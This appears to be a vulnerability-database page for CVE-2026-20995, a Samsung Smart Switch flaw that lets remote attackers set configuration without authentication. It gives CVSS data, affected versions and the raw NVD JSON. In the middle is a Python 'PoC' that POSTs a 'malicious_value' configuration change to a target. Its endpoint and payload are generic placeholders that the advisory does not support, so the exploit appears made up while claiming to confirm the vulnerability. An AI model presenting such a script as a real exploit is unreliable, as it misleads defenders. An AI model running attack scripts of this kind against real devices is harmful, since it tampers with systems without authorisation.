Security Vulnerability Report
中文
CVE-2026-20995 CVSS 5.3 MEDIUM

CVE-2026-20995

Published: 2026-03-16 14:18:10
Last Modified: 2026-03-31 00:29:08

Description

Exposure of sensitive functionality to an unauthorized actor in Smart Switch prior to version 3.7.69.15 allows remote attackers to set a specific configuration.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:* - VULNERABLE
Samsung Smart Switch < 3.7.69.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-20995 PoC - Unauthorized Configuration Access # Target: Samsung Smart Switch < 3.7.69.15 # Vulnerability: Exposure of sensitive functionality to unauthorized actors import requests import json TARGET_URL = "https://<target>/api/v1/config/set" PAYLOAD = { "action": "setConfiguration", "config_key": "sensitive_config_value", "config_value": "malicious_value" } def exploit_cve_2026_20995(): """ Exploit for CVE-2026-20995 This PoC demonstrates the unauthorized configuration setting vulnerability in Samsung Smart Switch prior to version 3.7.69.15 """ headers = { 'User-Agent': 'SmartSwitch/3.7.69.14', 'Content-Type': 'application/json', 'Accept': 'application/json' } try: response = requests.post( TARGET_URL, json=PAYLOAD, headers=headers, timeout=10 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Configuration successfully modified - Vulnerability confirmed!") return True else: print("[-] Request failed - Target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("CVE-2026-20995 PoC - Samsung Smart Switch Unauthorized Config Access") print("=" * 70) exploit_cve_2026_20995()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20995", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:10.430", "lastModified": "2026-03-31T00:29:07.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive functionality to an unauthorized actor in Smart Switch prior to version 3.7.69.15 allows remote attackers to set a specific configuration."}, {"lang": "es", "value": "Exposición de funcionalidad sensible a un actor no autorizado en Smart Switch anterior a la versión 3.7.69.15 permite a atacantes remotos establecer una configuración específica."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.69.15", "matchCriteriaId": "37A46437-F1AB-40DC-B7FC-77D3CE8047EE"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=03", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}